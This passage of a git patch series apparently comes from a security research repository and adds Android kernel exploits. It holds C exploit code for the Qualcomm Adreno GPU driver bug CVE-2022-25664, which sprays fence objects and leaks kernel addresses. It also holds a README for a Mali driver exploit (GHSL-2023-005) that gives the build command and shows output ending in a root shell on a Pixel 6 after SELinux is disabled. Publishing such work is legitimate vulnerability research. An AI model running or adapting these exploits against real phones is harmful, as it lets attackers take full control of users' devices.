+ return syscall(__NR_io_setup, nr, ctxp);
+}
+
+static int io_destroy(aio_context_t ctx)
+{
+ return syscall(__NR_io_destroy, ctx);
+}
+
+int find_address() {
+ uint32_t *write_cmd_buf;
+ uint64_t *shared_mem_buf;
+ void *shared_mem_buf2;
+ uint64_t shared_mem_gpuaddr2;
+ uint32_t n = 2048;
+ uint64_t shared_mem_size = 0x2000;
+ uint32_t cmd_size;
+ uint64_t write_cmd_gpuaddr = 0;
+ uint64_t shared_mem_gpuaddr = 0;
+ uint64_t hole_size = 0x1000;
+ int fds[OBJS_PER_SLAB * CPU_PARTIAL];
+ int spray_fds[OBJ_SPRAY];
+
+ int fd = open("/dev/kgsl-3d0", O_RDWR);
+
+ if (fd == -1) {
+ err(1, "cannot open kgsl");
+ }
+
+ uint32_t ctx_id;
+ if (kgsl_ctx_create(fd, &ctx_id)) {
+ err(1, "kgsl_ctx_create failed.");
+ }
+
+ struct kgsl_syncsource_create syncsource = {0};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) {
+ err(1, "unable to create syncsource\n");
+ }
+
+ for (int i = 0; i < OBJ_SPRAY; i++) {
+ struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+ err(1, "Failed to create fence");
+ }
+ spray_fds[i] = create_fence.fence_fd;
+ }
+
+ for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) {
+ struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id};
+ if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) {
+ err(1, "Failed to create fence");
+ }
+ fds[i] = create_fence.fence_fd;
+ }
+
+ shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size);
+ write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000);
+ uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr;
+
+ write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE;
+
+ uint32_t* write_cmd_buf_start = write_cmd_buf;
+ cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n);
+
+ usleep(50000);
+ void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ shared_mem_buf2 = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+ if (shared_mem_buf2 == MAP_FAILED) {
+ err(1, "shared_mem_buf2 failed");
+ }
+
+ munmap(hole, hole_size);
+ aio_context_t ctx = 0;
+ uint32_t nr_events = 32;
+
+ migrate_to_cpu(0);
+ for (int i = 0; i < OBJS_PER_SLAB; i++) {
+ close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]);
+ }
+
+ for (int i = 0; i < (CPU_PARTIAL - 1); i++) {
+ close(fds[i * OBJS_PER_SLAB]);
+ }
+
+ if (io_setup(nr_events, &ctx) < 0) err(1, "io_setup error\n");
+ if (kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1) == -1) {
+ err(1, "kgsl_map failed (shared_mem_buf2)");
+ }
+
+ if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmd_size, 1, 0, write_cmd_gpuaddr, cmd_size)) {
+ err(1, "gpu_command failed.");
+ }
+ usleep(150000);
+ if (shared_mem_gpuaddr2 != write_cmd_gpuaddr_start + 0x1000) {
+ err(1, "wrong address layout shared_mem_gpuaddr2 %lx write_cmd_gpuaddr %lx\n", shared_mem_gpuaddr2, write_cmd_gpuaddr);
+ }
+ if (ctx != (uint64_t)shared_mem_buf2 + 0x1000) {
+ err(1, "wrong address layout shared_mem_buf2 %p ctx %lx\n", shared_mem_buf2, ctx);
+ }
+
+ int ret = dma_search(shared_mem_buf + 0x1000/8, 0x1000/8, KERNEL_BRANCH);
+ if (ret == -1) {
+ io_destroy(ctx);
+ munmap(shared_mem_buf2, 0x1000);
+ munmap(shared_mem_buf, 0x2000);
+ munmap(write_cmd_buf, 0x1000);
+ for (int i = 0; i < (CPU_PARTIAL * OBJS_PER_SLAB); i++) close(fds[i]);
+ for (int i = 0; i < OBJ_SPRAY; i++) close(spray_fds[i]);
+ close(fd);
+ }
+ return ret;
+}
+
+int main() {
+
+ for (int i = 0; i < MMAP_SPRAY; i++) {
+ mmap(NULL, 0x1000,PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+ }
+ int success = -1;
+ int counter = 0;
+ while (success == -1) {
+ success = find_address();
+ counter++;
+ if (counter % 20 == 0) printf("failed after %d\n", counter);
+ }
+
+}
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
new file mode 100644
index 0000000..b103107
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/dma_search.h
@@ -0,0 +1,94 @@
+#ifndef DMA_SEARCH_H
+#define DMA_SEARCH_H
+
+#include
+#include
+
+#define OBJECT_SIZE 128
+
+#define STRIDE (OBJECT_SIZE/8)
+
+struct dma_info {
+ uint64_t ops;
+ uint64_t cb_list;
+ uint64_t spinlock;
+ uint64_t context;
+};
+
+enum dma_search_type {
+ KERNEL_4,
+ KERNEL_5
+};
+
+int try_match_object_54(uint64_t* obj, struct dma_info* out) {
+ //No ops
+ if (obj[1] == 0) return 0;
+ //cb_list not initialized
+ if (obj[2] != obj[3]) return 0;
+ //no cb_list
+ if (obj[2] == 0 || obj[3] == 0) return 0;
+ if (out->ops == 0) {
+ out->ops = obj[1];
+ out->cb_list = obj[2];
+ out->context = obj[4];
+ return 1;
+ }
+ if (out->ops != obj[1]) {
+ printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+ return 0;
+ }
+ return 1;
+}
+
+int try_match_object_414(uint64_t* obj, struct dma_info* out) {
+ //No ops
+ if (obj[1] == 0) return 0;
+ //rcu not zero
+ if (obj[2] != 0 || obj[3] != 0) return 0;
+ //cb_list not initialized
+ if (obj[4] != obj[5]) return 0;
+ //no cb_list
+ if (obj[4] == 0 || obj[5] == 0) return 0;
+ //no spinlock
+ if (obj[6] == 0) return 0;
+ if (out->ops == 0) {
+ out->ops = obj[1];
+ out->cb_list = obj[4];
+ out->spinlock = obj[6];
+ out->context = obj[7];
+ return 1;
+ }
+ if (out->ops != obj[1]) {
+ printf("out->ops %lx obj[1] %lx\n", out->ops, obj[1]);
+ return 0;
+ }
+ if (out->spinlock != obj[6]) {
+ printf("out->spinlock %lx obj[6] %lx\n", out->spinlock, obj[6]);
+ return 0;
+ }
+ return 1;
+};
+
+int dma_search(uint64_t* region, size_t len, enum dma_search_type type) {
+ if (len % OBJECT_SIZE != 0) err(1, "len is not divisible by object size\n");
+ struct dma_info info = {0};
+ int match = 0;
+ for (int i = 0; i < len; i+= STRIDE) {
+ if (type == KERNEL_4) {
+ match += try_match_object_414(region + i, &info);
+ } else if (type == KERNEL_5){
+ match += try_match_object_54(region + i, &info);
+ } else {
+ err(1, "unknown kernel branch\n");
+ }
+ }
+ if (match > 3) {
+ printf("found dma fence object:\n");
+ printf("kgsl_syncsource_fence_ops address: %lx\n", info.ops);
+ printf("object address: %lx\n", info.cb_list);
+ return 1;
+ }
+ return -1;
+};
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
new file mode 100644
index 0000000..1fc3c5a
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.c
@@ -0,0 +1,80 @@
+#include
+
+#include "kgsl_utils.h"
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id)
+{
+ struct kgsl_drawctxt_create req = {
+ .flags = 0x00001812,
+ };
+ int ret;
+
+ ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req);
+ if (ret)
+ return ret;
+
+ *ctx_id = req.drawctxt_id;
+
+ return 0;
+}
+
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) {
+ struct kgsl_command_object *cmds;
+
+ struct kgsl_gpu_command req = {
+ .context_id = ctx_id,
+ .cmdsize = sizeof(struct kgsl_command_object),
+ .numcmds = n,
+ };
+ size_t cmds_size;
+ uint32_t i;
+
+ cmds_size = n * sizeof(struct kgsl_command_object);
+
+ cmds = (struct kgsl_command_object *) malloc(cmds_size);
+
+ if (cmds == NULL) {
+ return -1;
+ }
+
+ memset(cmds, 0, cmds_size);
+
+ for (i = 0; i < n; i++) {
+ cmds[i].flags = KGSL_CMDLIST_IB;
+
+ if (i == target_idx) {
+ cmds[i].gpuaddr = target_cmd;
+ cmds[i].size = target_size;
+ }
+ else {
+ /* the shift here is helpful for debugging failed alignment */
+ cmds[i].gpuaddr = gpuaddr + (i << 16);
+ cmds[i].size = cmdsize;
+ }
+ }
+ req.cmdlist = (unsigned long) cmds;
+ return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
+}
+
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly) {
+ struct kgsl_map_user_mem req = {
+ .len = len,
+ .offset = 0,
+ .hostptr = addr,
+ .memtype = KGSL_USER_MEM_TYPE_ADDR,
+// .flags = KGSL_MEMFLAGS_USE_CPU_MAP,
+ };
+ if (readonly) {
+ req.flags |= KGSL_MEMFLAGS_GPUREADONLY;
+ }
+ int ret;
+
+ ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req);
+ if (ret)
+ return ret;
+
+ *gpuaddr = req.gpuaddr;
+
+ return 0;
+}
+
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
new file mode 100644
index 0000000..79033dc
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/kgsl_utils.h
@@ -0,0 +1,237 @@
+#ifndef KGSL_UTILS_H
+#define KGSL_UTILS_H
+
+#include
+#include
+#include
+
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+#define KGSL_OBJLIST_MEMOBJ 0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING 0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31)
+
+enum kgsl_user_mem_type {
+ KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
+ KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
+ KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
+ KGSL_USER_MEM_TYPE_ION = 0x00000003,
+ /*
+ * ION type is retained for backwards compatibility but Ion buffers are
+ * dma-bufs so try to use that naming if we can
+ */
+ KGSL_USER_MEM_TYPE_DMABUF = 0x00000003,
+ KGSL_USER_MEM_TYPE_MAX = 0x00000007,
+};
+
+struct kgsl_timeline_fence_get {
+ __u64 seqno;
+ __u32 timeline;
+ int handle;
+};
+
+#define IOCTL_KGSL_TIMELINE_FENCE_GET \
+ _IOWR(KGSL_IOC_TYPE, 0x5C, struct kgsl_timeline_fence_get)
+
+
+struct kgsl_timeline_create {
+ __u64 seqno;
+ __u32 id;
+/* private: padding for 64 bit compatibility */
+ __u32 padding;
+};
+
+#define IOCTL_KGSL_TIMELINE_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x58, struct kgsl_timeline_create)
+
+#define IOCTL_KGSL_TIMELINE_DESTROY _IOW(KGSL_IOC_TYPE, 0x5D, __u32)
+
+struct kgsl_device_getproperty {
+ unsigned int type;
+ void *value;
+ size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+ _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+ unsigned int id;
+ unsigned int flags;
+ uint64_t size;
+ uint64_t mmapsize;
+ unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+ _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_command_object {
+ uint64_t offset;
+ uint64_t gpuaddr;
+ uint64_t size;
+ unsigned int flags;
+ unsigned int id;
+};
+
+struct kgsl_gpu_command {
+ uint64_t flags;
+ uint64_t __user cmdlist;
+ unsigned int cmdsize;
+ unsigned int numcmds;
+ uint64_t __user objlist;
+ unsigned int objsize;
+ unsigned int numobjs;
+ uint64_t __user synclist;
+ unsigned int syncsize;
+ unsigned int numsyncs;
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+ int fd;
+ unsigned long gpuaddr; /*output param */
+ size_t len;
+ size_t offset;
+ unsigned long hostptr; /*input param */
+ enum kgsl_user_mem_type memtype;
+ unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+ _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+ _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB 0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+struct kgsl_gpuobj_import {
+ uint64_t __user priv;
+ uint64_t priv_len;
+ uint64_t flags;
+ unsigned int type;
+ unsigned int id;
+};
+
+struct kgsl_gpuobj_import_dma_buf {
+ int fd;
+};
+
+struct kgsl_gpuobj_import_useraddr {
+ uint64_t virtaddr;
+};
+
+struct kgsl_gpuobj_free {
+ uint64_t flags;
+ uint64_t __user priv;
+ unsigned int id;
+ unsigned int type;
+ unsigned int len;
+};
+
+#define KGSL_GPUOBJ_FREE_ON_EVENT 1
+
+#define KGSL_GPU_EVENT_TIMESTAMP 1
+#define KGSL_GPU_EVENT_FENCE 2
+
+struct kgsl_gpu_event_timestamp {
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_gpu_event_fence {
+ int fd;
+};
+
+struct kgsl_gpumem_free_id {
+ unsigned int id;
+/* private: reserved for future use*/
+ unsigned int __pad;
+};
+
+#define IOCTL_KGSL_GPUMEM_FREE_ID _IOWR(KGSL_IOC_TYPE, 0x35, struct kgsl_gpumem_free_id)
+
+#define IOCTL_KGSL_GPUOBJ_FREE \
+ _IOW(KGSL_IOC_TYPE, 0x46, struct kgsl_gpuobj_free)
+
+struct dma_buf_sync {
+ __u64 flags;
+};
+
+#define DMA_BUF_SYNC_READ (1 << 0)
+#define DMA_BUF_SYNC_WRITE (2 << 0)
+#define DMA_BUF_SYNC_RW (DMA_BUF_SYNC_READ | DMA_BUF_SYNC_WRITE)
+#define DMA_BUF_SYNC_START (0 << 2)
+#define DMA_BUF_SYNC_END (1 << 2)
+#define DMA_BUF_SYNC_USER_MAPPED (1 << 3)
+
+#define DMA_BUF_SYNC_VALID_FLAGS_MASK \
+ (DMA_BUF_SYNC_RW | DMA_BUF_SYNC_END)
+
+#define DMA_BUF_BASE 'b'
+#define DMA_BUF_IOCTL_SYNC _IOW(DMA_BUF_BASE, 0, struct dma_buf_sync)
+
+#define KGSL_MEMFLAGS_FORCE_32BIT 0x100000000ULL
+
+
+struct kgsl_syncsource_create {
+ unsigned int id;
+/* private: reserved for future use */
+ unsigned int __pad[3];
+};
+
+#define IOCTL_KGSL_SYNCSOURCE_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x40, struct kgsl_syncsource_create)
+
+struct kgsl_syncsource_create_fence {
+ unsigned int id;
+ int fence_fd;
+/* private: reserved for future use */
+ unsigned int __pad[4];
+};
+
+/**
+ * struct kgsl_syncsource_signal_fence - Argument to
+ * IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE
+ * @id: syncsource id
+ * @fence_fd: sync_fence fd to signal
+ *
+ * Signal a fence that was created by a IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE
+ * call using the same syncsource id. This allows a fence to be shared
+ * to other processes but only signaled by the process owning the fd
+ * used to create the fence.
+ */
+#define IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE \
+ _IOWR(KGSL_IOC_TYPE, 0x42, struct kgsl_syncsource_create_fence)
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id);
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size);
+int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly);
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
new file mode 100644
index 0000000..7224cc6
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
@@ -0,0 +1,218 @@
+#ifndef ADRENO_H
+#define ADRENO_H
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+enum kgsl_user_mem_type {
+ KGSL_USER_MEM_TYPE_PMEM = 0x00000000,
+ KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,
+ KGSL_USER_MEM_TYPE_ADDR = 0x00000002,
+ KGSL_USER_MEM_TYPE_ION = 0x00000003,
+ KGSL_USER_MEM_TYPE_DMABUF = 0x00000003,
+ KGSL_USER_MEM_TYPE_MAX = 0x00000007,
+};
+
+struct kgsl_command_object {
+ uint64_t offset;
+ uint64_t gpuaddr;
+ uint64_t size;
+ unsigned int flags;
+ unsigned int id;
+};
+
+struct kgsl_gpu_command {
+ uint64_t flags;
+ uint64_t __user cmdlist;
+ unsigned int cmdsize;
+ unsigned int numcmds;
+ uint64_t __user objlist;
+ unsigned int objsize;
+ unsigned int numobjs;
+ uint64_t __user synclist;
+ unsigned int syncsize;
+ unsigned int numsyncs;
+ unsigned int context_id;
+ unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+ int fd;
+ unsigned long gpuaddr; /*output param */
+ size_t len;
+ size_t offset;
+ unsigned long hostptr; /*input param */
+ enum kgsl_user_mem_type memtype;
+ unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+ _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+ _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB 0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL
+
+#define CP_TYPE4_PKT (4 << 28)
+#define CP_TYPE7_PKT (7 << 28)
+
+#define CP_NOP 0x10
+#define CP_WAIT_FOR_ME 0x13
+#define CP_WAIT_FOR_IDLE 0x26
+#define CP_WAIT_REG_MEM 0x3c
+#define CP_MEM_WRITE 0x3d
+#define CP_INDIRECT_BUFFER_PFE 0x3f
+#define CP_SET_DRAW_STATE 0x43
+#define CP_MEM_TO_MEM 0x73
+#define CP_SET_PROTECTED_MODE 0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+
+#define PT_BASE 0xfc000000
+#define KGSL_OBJLIST_MEMOBJ 0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING 0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31)
+
+struct kgsl_device_getproperty {
+ unsigned int type;
+ void *value;
+ size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+ _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+ unsigned int id;
+ unsigned int flags;
+ uint64_t size;
+ uint64_t mmapsize;
+ unsigned long gpuaddr;
+};
+
+struct kgsl_gpumem_free_id {
+ unsigned int id;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+ _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_sharedmem_free {
+ unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_SHAREDMEM_FREE \
+ _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)
+
+static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+ uint *start = cmds;
+
+ *cmds++ = lower_32_bits(gpuaddr);
+ *cmds++ = upper_32_bits(gpuaddr);
+
+ return cmds - start;
+}
+
+static inline uint pm4_calc_odd_parity_bit(uint val) {
+ return (0x9669 >> (0xf & ((val) ^
+ ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+ ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+ ((val) >> 28)))) & 1;
+}
+
+static inline uint cp_type7_packet(uint opcode, uint cnt) {
+ return CP_TYPE7_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 15) |
+ (((opcode) & 0x7F) << 16) |
+ ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+static inline uint cp_wait_for_me(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+ return cmds - start;
+}
+
+static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+ return cp_type7_packet(opcode, size + num_mem);
+}
+
+static inline uint cp_wait_for_idle(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+ return cmds - start;
+}
+
+static inline int _adreno_iommu_add_idle_indirect_cmds(
+ unsigned int *cmds)
+{
+ unsigned int *start = cmds;
+ cmds += cp_wait_for_me(cmds);
+ *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1);
+ cmds += cp_gpuaddr(cmds, 0xfc000000+1024);
+ *cmds++ = 2;
+ cmds += cp_wait_for_idle(cmds);
+ return cmds - start;
+}
+
+static inline uint cp_type4_packet(uint opcode, uint cnt)
+{
+ return CP_TYPE4_PKT | ((cnt) << 0) |
+ (pm4_calc_odd_parity_bit(cnt) << 7) |
+ (((opcode) & 0x3FFFF) << 8) |
+ ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+static inline uint cp_register(
+ unsigned int reg, unsigned int size)
+{
+ return cp_type4_packet(reg, size);
+}
+
+static inline uint cp_invalidate_state(
+ uint *cmds)
+{
+ uint *start = cmds;
+
+ *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+ *cmds++ = 0x40000;
+ *cmds++ = 0;
+ *cmds++ = 0;
+
+ return cmds - start;
+}
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
new file mode 100644
index 0000000..ba980e8
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
@@ -0,0 +1,221 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "adreno.h"
+
+#define LEAK_SIZE 100
+
+#define COMMAND_SIZE 4
+
+static void hexdump(void *_data, size_t byte_count) {
+ printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count);
+ for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
+ unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
+ uint64_t line_bytes = (byte_count - byte_offset > 16) ?
+ 16 : (byte_count - byte_offset);
+ char line[1000];
+ char *linep = line;
+ linep += sprintf(linep, "%08lx ", byte_offset);
+ for (int i=0; i<16; i++) {
+ if (i >= line_bytes) {
+ linep += sprintf(linep, " ");
+ } else {
+ linep += sprintf(linep, "%02hhx ", bytes[i]);
+ }
+ }
+ linep += sprintf(linep, " |");
+ for (int i=0; i
Date: Tue, 21 Feb 2023 11:53:35 +0000
Subject: [PATCH 08/53] Initial commit
---
.../Android/Mali/GHSL-2023-005/README.md | 39 +
.../Android/Mali/GHSL-2023-005/mali.h | 1060 ++++++++++++++
.../Mali/GHSL-2023-005/mali_base_jm_kernel.h | 1216 +++++++++++++++++
.../Android/Mali/GHSL-2023-005/mali_jit.c | 659 +++++++++
.../Android/Mali/GHSL-2023-005/midgard.h | 260 ++++
5 files changed, 3234 insertions(+)
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/README.md
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali_base_jm_kernel.h
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/mali_jit.c
create mode 100644 SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/README.md b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
new file mode 100644
index 0000000..76a9978
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/README.md
@@ -0,0 +1,39 @@
+## Exploit for GHSL-2023-005
+
+The write-up can be found [here]() <!-- TODO: add write-up link -->. A security patch from the upstream Arm Mali driver was somehow omitted from the update for the Pixel phones, and I reported the issue to Google in January 2023. The bug can be used to gain arbitrary kernel code execution from the untrusted app domain, which is then used to disable SELinux and gain root.
+
+The exploit is tested on the Google Pixel 6 for devices running the January 2023 patch. For reference, I used the following command to compile it with clang in ndk-21:
+
+```
+android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -DSHELL mali_jit.c -o mali_jit
+```
+
+The exploit should be run a couple of minutes after boot and should be fairly reliable. If it fails, it can be rerun and should succeed within a few attempts.
+If successful, it should disable SELinux and gain root.
+
+```
+oriole:/ $ /data/local/tmp/mali_jit
+fingerprint: google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys
+region freed
+found region 16115 at 7000200000
+overwrite addr : 7ae9700710 710
+overwrite addr : 7ae9500710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828500710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7828300710 710
+overwrite addr : 7828100710 710
+overwrite addr : 7ae9700fd4 fd4
+overwrite addr : 7ae9500fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828500fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+overwrite addr : 7828300fd4 fd4
+overwrite addr : 7828100fd4 fd4
+result 50
+oriole:/ #
+```
diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
new file mode 100644
index 0000000..3b61e20
--- /dev/null
+++ b/SecurityExploits/Android/Mali/GHSL-2023-005/mali.h
@@ -0,0 +1,1060 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2020-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_KBASE_JM_IOCTL_H_
+#define _UAPI_KBASE_JM_IOCTL_H_
+
+#include <asm/ioctl.h>
+#include <linux/types.h>
+
+/*
+ * 11.1:
